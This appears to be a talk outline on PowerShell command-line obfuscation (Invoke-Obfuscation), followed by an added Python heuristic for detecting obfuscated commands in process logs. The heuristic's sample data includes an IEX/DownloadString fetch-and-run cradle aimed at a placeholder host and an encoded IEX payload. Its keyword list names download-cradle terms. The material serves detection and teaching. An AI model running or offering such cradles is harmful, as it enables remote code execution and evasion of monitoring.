PowerShell Command Line Argument Obfuscation Techniques

Invoke-Obfuscation:

PowerShell obFUsk8tion Techniques & How To (Try To)

D""e`Tec`T 'Th'+'em'

Daniel Bohannon @danielhbohannon

Who I Am

- Daniel Bohannon, @danielhbohannon
- Blue Team with increasing exposure to Red Team
- Incident Response Consultant at Mandiant (1.5 yrs)
- Previously 5 yrs in an IT Operations and Security role for a national restaurant franchise

Shortage of memes cat pictures


Outline:

- Motivation
- Preparing Your Environment for Investigating PowerShell
- Obfuscating the Cradle: (New-Object Net.WebClient)
- Additional Methods for Remote Download
- More Obfuscation Techniques and Detection Attempts
- What's Old Is New: Encoding/Decoding with PS 1.0
- Launch Techniques
- Invoke-Obfuscation Demo

Motivation

- PowerShell as an attack platform and post-exploitation framework is an ever-increasing trend
  - Native, Microsoft-signed Windows binary (included by default since Windows 7; available as an add-on for Vista)
  - In-memory execution (evades file-based A/V and application whitelisting)
  - Ever-expanding set of attack frameworks built on it

- Used by advanced attackers, script kiddies and penetration testers alike, in both targeted attacks and commodity malware
- Nearly impossible to detect unless command-line arguments and/or PowerShell event logs are collected and monitored
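The last point is the one a defender can act on: an obfuscated command line is still a logged command line, and the tells the deck's own title shows (backticks, empty "" strings, 'a'+'b' concatenation) survive in the log. As an added example (my code, not from the slides or from Invoke-Obfuscation), the Python below runs a detection heuristic over a few constructed process-creation log lines: it counts those tells, decodes an -EncodedCommand payload, and normalizes the line far enough to match download-cradle terms through the obfuscation. The sample lines, the escape-letter set, the ENC_RE pattern and the "any indicator is suspicious" threshold are assumptions for illustration, not the author's detection logic.

```python
import base64
import re

# Lowercase letters that form a real escape after a backtick inside a
# double-quoted string (`n, `t, `0 ...). A tick before any other character
# escapes nothing and only serves obfuscation. (Assumed set, taken from the
# PowerShell escape-sequence table, not from the slides.)
ESCAPE_LETTERS = set("0abefnrtuv")

# Heuristic match for -e / -ec / -enc / -EncodedCommand plus its Base64 payload
# (PowerShell accepts any unambiguous prefix of -EncodedCommand). Assumption.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{8,})")
TICK_RE = re.compile(r"`(?![0abefnrtuv])")   # ticks that escape nothing
CONCAT_RE = re.compile(r"['\"]\s*\+\s*['\"]")  # 'a'+'b' string gluing
CRADLE_TERMS = ("net.webclient", "downloadstring", "invoke-expression", "iex")


def tokenize(cmd):
    """Split a command line into ('bare', text) and ('str', quote, content)."""
    tokens, bare, i, n = [], [], 0, len(cmd)
    while i < n:
        c = cmd[i]
        if c not in "'\"":
            bare.append(c)
            i += 1
            continue
        if bare:
            tokens.append(("bare", "".join(bare)))
            bare = []
        q, i, content = c, i + 1, []
        while i < n:
            if cmd[i] == "`" and q == '"' and i + 1 < n:   # escaped char
                content.extend(cmd[i:i + 2])
                i += 2
            elif cmd[i] == q and i + 1 < n and cmd[i + 1] == q:  # doubled quote
                content.append(q)
                i += 2
            elif cmd[i] == q:                                 # closing quote
                i += 1
                break
            else:
                content.append(cmd[i])
                i += 1
        tokens.append(("str", q, "".join(content)))
    if bare:
        tokens.append(("bare", "".join(bare)))
    return tokens


def strip_ticks(text):
    """Drop backticks that escape nothing; keep real escapes such as `n."""
    out, i = [], 0
    while i < len(text):
        if text[i] == "`" and i + 1 < len(text) and text[i + 1] not in ESCAPE_LETTERS:
            i += 1            # skip the tick; the next char is emitted as-is
            continue
        out.append(text[i])
        i += 1
    return "".join(out)


def normalize(cmd):
    """Undo tick insertion, empty-string insertion and 'a'+'b' concatenation."""
    toks = [t for t in tokenize(cmd) if not (t[0] == "str" and t[2] == "")]
    merged = []
    for t in toks:
        if t[0] == "bare":
            t = ("bare", strip_ticks(t[1]))
        elif t[1] == '"':                       # ticks inside "..." too
            t = ("str", '"', strip_ticks(t[2]))
        # str '+' str  ->  one str with the contents glued together
        if (t[0] == "str" and len(merged) >= 2 and merged[-1][0] == "bare"
                and merged[-1][1].strip() == "+" and merged[-2][0] == "str"):
            merged.pop()                        # drop the '+'
            left = merged.pop()
            t = ("str", left[1], left[2] + t[2])
        merged.append(t)
    return "".join(t[1] if t[0] == "bare" else t[1] + t[2] + t[1] for t in merged)


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators(cmd):
    """Count the obfuscation tells a command-line log can reveal."""
    return {
        "ticks": len(TICK_RE.findall(cmd)),
        "empty_strings": sum(1 for t in tokenize(cmd) if t[0] == "str" and t[2] == ""),
        "concats": len(CONCAT_RE.findall(cmd)),
        "encoded": bool(ENC_RE.search(cmd)),
    }


def analyze(cmd):
    """Indicators plus cradle keywords matched on the normalized (deobfuscated) text."""
    ind = indicators(cmd)
    text = normalize(cmd)
    decoded = decode_encoded_command(cmd)
    if decoded:
        text += " " + normalize(decoded)
    low = text.lower()
    ind["cradle_terms"] = [t for t in CRADLE_TERMS
                           if re.search(r"\b" + re.escape(t) + r"\b", low)]
    ind["normalized"] = text
    ind["suspicious"] = (ind["ticks"] + ind["empty_strings"] + ind["concats"] > 0
                         or ind["encoded"] or bool(ind["cradle_terms"]))
    return ind


# Constructed process-creation command lines (not from the slides), as a
# Sysmon / 4688 / EDR log would record them.
SAMPLE_LOG = [
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "powershell.exe D\"\"e`Tec`T 'Th'+'em'",          # the deck's own title
    'powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',
    "powershell -nop -w hidden -enc SQBFAFgA",         # Base64(UTF-16LE "IEX")
]


def scan(lines):
    """Return (line, analysis) for every line that trips an indicator."""
    hits = []
    for line in lines:
        a = analyze(line)
        if a["suspicious"]:
            hits.append((line, a))
    return hits


if __name__ == "__main__":
    for line, a in scan(SAMPLE_LOG):
        print(a["normalized"], "->", {k: v for k, v in a.items() if k != "normalized"})
```

Three of the four constructed lines are flagged; the benign Get-Service line is not. The normalizer turns the title line into "DeTecT 'Them'", which is why the cradle-term check is run on normalized text rather than the raw line: a cradle written as `Net.Web`Client` or `'Download'+'String'` would otherwise slip past a plain keyword match. The heuristic is deliberately loose and will need tuning against your own baseline before it becomes an alert.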
